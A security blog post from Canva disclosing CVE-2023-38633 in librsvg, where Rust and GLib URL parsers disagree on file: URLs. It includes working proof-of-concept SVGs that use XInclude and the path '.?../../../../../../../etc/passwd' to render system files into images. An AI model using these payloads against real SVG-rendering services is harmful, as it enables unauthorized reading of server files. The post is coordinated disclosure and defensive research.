Security

When URL parsers disagree (CVE-2023-38633)

Discovery and walkthrough of CVE-2023-38633 in librsvg, where two URL parser implementations (Rust and GLib) disagree on file scheme parsing, leading to path traversal.


Zac Sims

As part of Canva's ongoing mission to build the world's most trusted platform, we continuously evaluate the security of our software dependencies. Identifying and resolving vulnerabilities in third-party dependencies helps improve the security of Canva, as well as the wider internet. Coupled with security controls like sandboxing, we continue to make it increasingly difficult for attackers to reach their objectives by exploiting third-party dependencies.

One such dependency Canva uses is librsvg (via libvips). We use librsvg to quickly render user-provided SVGs into thumbnails later displayed as PNGs. By exploiting differences in URL parsers when rendering an SVG with librsvg, we showed it's possible to include arbitrary files from disk in the resulting image. The librsvg maintainers quickly patched the issue, which was disclosed as CVE-2023-38633.

We're sharing this research as another example of the dangers of mixing URL parsers, especially because the example we discovered is very subtle.

A special thanks to Federico (librsvg maintainer), John (libvips maintainer), and Lovell (Sharp maintainer) for their work and excellent coordinated response.

Prequel

The XML Parsing Issues in Inkscape in CLI write-up from Elttam's Victor Kahan shows how Inkscape is vulnerable to path traversal when rendering SVGs. Extending Victor's research, we found that while XInclude wasn't directly supported in Inkscape 0.9, it exhibited some interesting behavior when an SVG was nested in another SVG.

For example, consider the following inner SVG.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,204,204);" />
  <text x="0" y="100">
    <xi:include href="/etc/passwd" parse="text" encoding="ASCII">
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>
XML

We encoded it as a URI and placed it inside another SVG, outer.svg.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xlink="http://www.w3.org/1999/xlink">
<image
xlink:href="data:image/svg;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+Cjxzdmcgd2lkdGg9IjMwMCIgaGVpZ2h0PSIzMDAiIHhtbG5zOnhpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hJbmNsdWRlIj4KICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjMwMCIgc3R5bGU9ImZpbGw6cmdiKDI1NSwyMDQsMjA0KTsiIC8+CiAgPHRleHQgeD0iMCIgeT0iMTAwIj4KICAgIDx4aTppbmNsdWRlIGhyZWY9Ii9ldGMvcGFzc3dkIiBwYXJzZT0idGV4dCIgZW5jb2Rpbmc9IkFTQ0lJIj4KICAgICAgPHhpOmZhbGxiYWNrPmZpbGUgbm90IGZvdW5kPC94aTpmYWxsYmFjaz4KICAgIDwveGk6aW5jbHVkZT4KICA8L3RleHQ+Cjwvc3ZnPg=="
/>
</svg>
XML

When run with Inkscape 0.92.4, it produced an image where the XInclude fallback was triggered.

$ inkscape -f test.svg -e out.png -w 300
SHELL

Figure: the rendered image shows the fallback text "file not found".

The fact that XInclude was supported at all was surprising because it can often lead to security vulnerabilities. While Inkscape isn't used by the Canva product, digging into the Inkscape code path showed that nested images are loaded with GdkPixbuf, which itself delegates SVG loading to librsvg. This was of great interest because librsvg is something that Canva does use.

XInclude

XInclude is a mechanism for merging XML documents, which can lead to security vulnerabilities when a user-provided XML document (like an SVG) is assembled or rendered on a server.

Figure: XInclude example

There are two standout elements in XInclude:

  • xi:include to include contents of a referenced URL, such as a file or HTTP request. The content being included can be plaintext or XML.
  • xi:fallback to nominate content that should be rendered when the referenced content can't be loaded by xi:include.

Security checks aside, the following XML document loads the contents of /etc/passwd when processed.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<example xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="/etc/passwd" parse="text" encoding="ASCII">
    <xi:fallback>file not found</xi:fallback>
  </xi:include>
</example>
XML

There are rules

librsvg is a library that renders SVG images to Cairo surfaces. Most of the heavy lifting is now implemented in Rust, but the library still relies on the Cairo and GNOME GLib C libraries.

Figure: librsvg overview

From the prequel, we knew librsvg supported at least some of the XInclude standard. To understand how much, we dug into its implementation. As it turns out, every external URL reference in an SVG passes through a single method for validation. This includes references such as:

  • <image href="file:///something.png" />
  • <rect filter="url('file-with-filters.svg#my_filter')" />
  • <xi:include href="/etc/passwd" ... />

The librsvg url_resolver.resolve_href method implements some strict security checks to restrict what references can be loaded when processing an SVG document:

  • All data: URLs are permitted because they can't reference external files by design.
  • The referenced scheme must match the "current document" scheme. For example, when processing file:///foo/bar/example.svg, any encountered URL must be of the file: scheme.
  • Encountered files must be in the same directory as the current document, or within a subdirectory of the current document. This is enforced by checking the URL path.
  • All other schemes are rejected, including http:.

These strict rules are the reason our earlier naive XInclude tests failed. But we were very interested to see if we could bypass the rules. A bypass could result in path traversal when processing an SVG, for example, including files like /etc/passwd in the PNG rendered from the SVG.
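
The rules listed above can be sketched as a small, self-contained check. This is not librsvg's code: ParsedRef, Rejection, and check_reference are hypothetical names, the sketch only handles file: documents, and it assumes both paths have already been canonicalized (no . or .. segments left).

```rust
use std::path::Path;

/// Why a reference was rejected (hypothetical type for this sketch).
#[derive(Debug, PartialEq)]
pub enum Rejection {
    SchemeMismatch,
    UnsupportedScheme,
    OutsideDocumentDir,
}

/// Simplified view of an already-parsed URL: just a scheme and a path.
pub struct ParsedRef<'a> {
    pub scheme: &'a str,
    pub path: &'a str,
}

/// Applies the four rules to one reference found in `doc`.
/// Assumes both paths are already canonical.
pub fn check_reference(doc: &ParsedRef, reference: &ParsedRef) -> Result<(), Rejection> {
    // data: URLs are always allowed.
    if reference.scheme == "data" {
        return Ok(());
    }
    // The reference must use the same scheme as the current document.
    if reference.scheme != doc.scheme {
        return Err(Rejection::SchemeMismatch);
    }
    // This sketch only knows how to reason about file: paths.
    if reference.scheme != "file" {
        return Err(Rejection::UnsupportedScheme);
    }
    // The file must live in the document's directory or below it.
    let doc_dir = Path::new(doc.path).parent().unwrap_or(Path::new("/"));
    if Path::new(reference.path).starts_with(doc_dir) {
        Ok(())
    } else {
        Err(Rejection::OutsideDocumentDir)
    }
}
```

With a document at /srv/svg/current.svg, a reference to /srv/svg/img/a.png is accepted and a reference to /etc/passwd is rejected. The check is only as good as the path it is handed, which is why the parser that produces that path matters so much.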

Parser Mismatch

Resolving a URL within an SVG document has two steps:

  1. Validate the URL as per the resolve rules mentioned earlier.
  2. If successful, load the contents, which parses URLs using Gio's built-in URI parser.

Excerpts from mod.rs and io.rs are as follows.

// xml/mod.rs
fn acquire(&self, href: Option<&str>, /* ... */) -> Result<(), AcquireError> {
    // Step 1: validate the reference with the Rust URL parser.
    let aurl = self.url_resolver.resolve_href(href) // ...
    // ...
    self.acquire_text(&aurl, encoding);
}

fn acquire_text(&self, aurl: &AllowedUrl, encoding: Option<&str>) -> Result<(), AcquireError> {
    let binary = io::acquire_data(aurl, None);
    // ...
    return result;
}

// io.rs
pub fn acquire_data(aurl: &AllowedUrl, /* ... */) -> Result<BinaryData, IoError> {
    // Step 2: the validated URL is turned back into a string and parsed again by Gio.
    let uri = aurl.as_str();
    // ...
    let file = GFile::for_uri(uri);
    let (contents, _etag) = file.load_contents(cancellable)?;
    // ...
    return contents;
    // ...
}
RUST

Knowing there were two URL parsers at play (one to validate the URL and one to load the contents), to bypass the security checks, we needed to find URLs where the parsers disagreed.

With some quick tests, we mapped out how the URL parsers process different URLs.

URL: file:///etc/passwd?foo=bar#baz

Rust url parsed result:

  Component   Value
  Scheme      file
  Host        None
  Path        /etc/passwd
  Query       foo=bar
  Fragment    baz

Gio doesn't expose generic URL parsing (aside from GUri, which isn't on the call path). However, g_filename_from_uri returns the following results for some example URLs.

  URL                               g_filename_from_uri result
  file:///etc/passwd?foo=bar#baz    /etc/passwd?foo=bar#baz (see note)
  file:///etc/passwd                /etc/passwd
  file:///etc/passwd&hello          /etc/passwd&hello
  file:///etc/passwd@host           /etc/passwd@host
  file://host/etc/passwd            /etc/passwd

Note: As of GLib commit 3986471, the first example now fails because of the ? and # characters.
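
To make the disagreement concrete, here is a minimal sketch of the two views of the same file: URL. Neither function is a real implementation: strict_components and lenient_filename are hypothetical stand-ins for a generic URL parser and for the older g_filename_from_uri behavior observed above, and percent-decoding is left out entirely.

```rust
/// Path, query, and fragment as a generic URL parser would report them.
#[derive(Debug, PartialEq)]
pub struct Components {
    pub path: String,
    pub query: Option<String>,
    pub fragment: Option<String>,
}

/// Strict view: '#' starts the fragment and '?' starts the query,
/// so neither is part of the path.
pub fn strict_components(url: &str) -> Option<Components> {
    let rest = url.strip_prefix("file://")?;
    // Skip an optional host: the path starts at the first '/'.
    let start = rest.find('/')?;
    let rest = &rest[start..];
    let (rest, fragment) = match rest.split_once('#') {
        Some((before, frag)) => (before, Some(frag.to_string())),
        None => (rest, None),
    };
    let (path, query) = match rest.split_once('?') {
        Some((before, q)) => (before, Some(q.to_string())),
        None => (rest, None),
    };
    Some(Components { path: path.to_string(), query, fragment })
}

/// Lenient view: everything after the optional host is the filename,
/// including any '?' and '#' characters.
pub fn lenient_filename(url: &str) -> Option<String> {
    let rest = url.strip_prefix("file://")?;
    let start = rest.find('/')?;
    Some(rest[start..].to_string())
}
```

For file:///etc/passwd?foo=bar#baz, the strict view reports the path /etc/passwd, while the lenient view returns the filename /etc/passwd?foo=bar#baz. Any check made against the first value says little about what the second one will open.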

Bypassing Validation

With this understanding of how the two URL parsers behave, we took the relevant parts from librsvg and set up a fuzzing harness ("resolve") that runs the same URL resolution logic librsvg applies when it encounters a reference (href, XInclude, etc.) from an on-disk "current.svg" file. This allowed us to quickly test and fuzz inputs to see how the parsers and validation logic evaluated them. Some interesting outputs from fuzzing were as follows:

  • resolve 'current.svg': Passes as expected.
  • resolve '../../../../../../../etc/passwd': Canonicalization fails with 'No such file or directory'.
  • resolve 'current.svg?../../../../../../../etc/passwd': Passes.
  • resolve 'none/../current.svg': Passes as expected.

The last two results showed us that GFile::for_uri happily resolves path traversals, including path traversals in the query string. However, the second result, ../../../../../../../etc/passwd, failed because of the canonicalization check.
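
One way to read these results: if the loader treats ? as an ordinary filename character and then collapses .. segments lexically, a segment such as current.svg?.. is just an oddly named directory that the next .. cancels. The sketch below assumes that behavior. normalize_lexically is a hypothetical helper written for illustration, not GLib's implementation.

```rust
/// Lexically normalizes an absolute path: drops "." and empty segments and
/// lets each ".." cancel the previous segment. The filesystem is never
/// consulted, so cancelled segments do not need to exist.
pub fn normalize_lexically(path: &str) -> String {
    let mut stack: Vec<&str> = Vec::new();
    for segment in path.split('/') {
        match segment {
            "" | "." => {}
            ".." => {
                // Popping an empty stack is a no-op, so the path never
                // climbs above the root.
                stack.pop();
            }
            other => stack.push(other),
        }
    }
    format!("/{}", stack.join("/"))
}
```

Under this assumption, /srv/svg/current.svg?../../../../etc/passwd normalizes to /etc/passwd: the first .. is fused into the segment current.svg?.., and the remaining three remove that segment, svg, and srv.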

Bypassing Canonicalization

Part of librsvg's URL validation is to canonicalize the built URL to replace .. and . segments per regular filesystem path rules. It does this using Rust's std::fs::canonicalize (calling realpath), which returns an error if:

  • The path doesn't exist.
  • A non-final component in the path isn't a directory.

Because we don't always know the name of the 'current' SVG on disk, we needed to bypass canonicalization if we wanted to have a URL pass librsvg's validation. After some rapid testing, it turns out this is relatively straightforward.

$ realpath current.svg
/home/zsims/projects/librsvg-poc/current.svg
$ realpath .
/home/zsims/projects/librsvg-poc/
SHELL

As it turns out, realpath(".") and std::fs::canonicalize(".") both return the "current directory". We can use this as a placeholder in our PoC instead of current.svg.
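
The same behavior is easy to check from Rust. The helper below is a hypothetical wrapper (canonical_in is not a librsvg function) that joins a reference onto a directory and canonicalizes the result with std::fs::canonicalize.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// Joins `reference` onto `dir` and canonicalizes the result.
/// Fails if the resulting path does not exist on disk.
pub fn canonical_in(dir: &Path, reference: &str) -> io::Result<PathBuf> {
    fs::canonicalize(dir.join(reference))
}
```

For an existing directory, canonical_in(dir, ".") succeeds and yields the canonical form of the directory itself, with no file name required. A reference to a file that does not exist in that directory returns an error instead.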

Proof of concept

Knowing how the URL parsers mismatch, and how we can bypass canonicalization without knowing the current file name, we can build a payload to include /etc/passwd.

.?../../../../../../../etc/passwd

Within a poc.svg SVG, this looks like the following.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,204,204);" />
  <text x="0" y="100">
    <xi:include
      href=".?../../../../../../../etc/passwd"
      parse="text"
      encoding="ASCII"
    >
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>
XML

Rendering it produces the following result.

$ rsvg-convert poc.svg > poc.png

Figure: Proof of concept

We get a similar result when running through vipsthumbnail.

Sensitive files within /proc, such as /proc/self/environ, failed because of character encoding: the panic below reports a NulError, which points to a NUL byte in the included contents.

$ rsvg-convert proc-poc.svg > proc-poc.png
thread 'main' panicked at 'str::ToGlibPtr<*const c_char>: unexpected '' character: NulError(21...
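
The NulError in that message is the error type Rust's standard library returns when a string with an interior NUL byte is converted to a C string. Assuming the panic comes from such a conversion in the GLib bindings, as the message suggests, the failure can be reproduced in isolation. c_string_nul_position is a hypothetical helper for this sketch.

```rust
use std::ffi::CString;

/// Returns the position of the first interior NUL byte that prevents `text`
/// from being converted into a C string, or None if the conversion succeeds.
pub fn c_string_nul_position(text: &str) -> Option<usize> {
    match CString::new(text) {
        Ok(_) => None,
        Err(err) => Some(err.nul_position()),
    }
}
```

Text without NUL bytes converts cleanly, while a string shaped like NUL-separated environment entries fails at the first separator.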

Note that this PoC only works where the SVG is loaded from a file:// URL. SVGs loaded through data: or resource: schemes are not vulnerable.

Patch

Following the report to librsvg's maintainer (see Issue 996), Federico patched the issue to add improved URL validation and use the validated URL as input into GFile. Part of the response from Federico included a heads-up to maintainers of Sharp and libvips to upgrade before the issue was disclosed publicly as CVE-2023-38633.
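
The general idea of feeding the loader only what the validator produced can be sketched with a wrapper type. This is an illustration of the pattern, not the actual librsvg patch: ValidatedPath, its validation rule, and load are all hypothetical.

```rust
use std::fs;
use std::io;
use std::path::{Component, Path, PathBuf};

/// A path that has already passed validation. The inner value is private, so
/// code outside this module can only obtain one through `ValidatedPath::new`.
pub struct ValidatedPath(PathBuf);

impl ValidatedPath {
    /// Hypothetical rule: `candidate` must be absolute, must contain no ".."
    /// components, and must be located under `allowed_dir`.
    pub fn new(allowed_dir: &str, candidate: &str) -> Option<ValidatedPath> {
        let path = Path::new(candidate);
        let is_clean = path
            .components()
            .all(|c| matches!(c, Component::RootDir | Component::Normal(_)));
        if path.is_absolute() && is_clean && path.starts_with(allowed_dir) {
            Some(ValidatedPath(path.to_path_buf()))
        } else {
            None
        }
    }

    pub fn as_path(&self) -> &Path {
        &self.0
    }
}

/// The loader accepts only a `ValidatedPath`, so it cannot be handed the
/// original string and parse it a second time with different rules.
pub fn load(path: &ValidatedPath) -> io::Result<Vec<u8>> {
    fs::read(path.as_path())
}
```

Because load has no way to receive a raw string, a path shaped like /srv/svg/?../../../etc/passwd is rejected at construction and never reaches the filesystem.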

The issue also prompted some discussion about file URL parsing in glib, resulting in some additional validation in the library.

There were a few standouts from discovery and patching:

  • The dangers of mixing URL parsers are just as applicable to file:// URLs and in-process use as they are for networked services and http:// URLs.
  • file:// URLs are special. For example, the URL specification highlights support for query strings in file:// URLs, but the support in the implementations we reviewed varied greatly.
  • Efforts to migrate existing C code to Rust are not without risk. Although memory safety is much improved, differences in contracts (like URL parsing) can have negative security consequences.
  • Make sure you're only parsing URLs once, and using that parsed value from that point onwards.
  • If possible, enforce your own validation on files, like SVGs, before processing further. This is why MediaWiki is not impacted by this issue: xi:include elements are rejected before the SVG reaches librsvg.

Timeline
